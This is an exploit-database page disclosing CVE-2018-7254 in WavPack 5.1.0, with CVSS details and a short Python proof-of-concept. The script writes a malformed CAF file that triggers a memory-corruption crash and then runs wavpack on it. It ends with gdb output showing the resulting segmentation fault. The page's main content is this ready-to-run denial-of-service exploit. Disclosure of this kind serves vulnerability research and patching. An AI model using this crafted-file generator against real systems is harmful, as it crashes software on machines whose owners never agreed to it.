Wavpack 5.1.0 Denial of Service

2018.02.22
Credit: r4xis
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit title: Wavpack 5.1.0 - Denial of Service # Date: 20.02.2018 # Exploit Author: r4xis # https://github.com/r4xis # # Vendor Homepage: http://www.wavpack.com/ # Software Links: http://www.wavpack.com/downloads.html # https://github.com/dbry/WavPack # # # Version: Wavpack 5.1.0 # Tested on: Debian 9.3.0 64 bit # Windows 7 32 bit and 64 bit # Windows 8 64 bit # # # CVE: CVE-2018-7254 # CVE Details: # https://nvd.nist.gov/vuln/detail/CVE-2018-7254 # https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274 # https://github.com/dbry/WavPack/issues/26 import os head = "\x63\x61\x66\x66" version = "\x00\x01" junk1 = "\x00"*(0xa0-6) crash = "\x80" junk2 = "\x00"*100 f=open("poc.caf", 'w') f.write(head+version+junk1+crash+junk2) f.close() os.system("wavpack poc.caf") ''' Debian gdb output: Program received signal SIGSEGV, Segmentation fault. __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333 333 ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory. '''


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top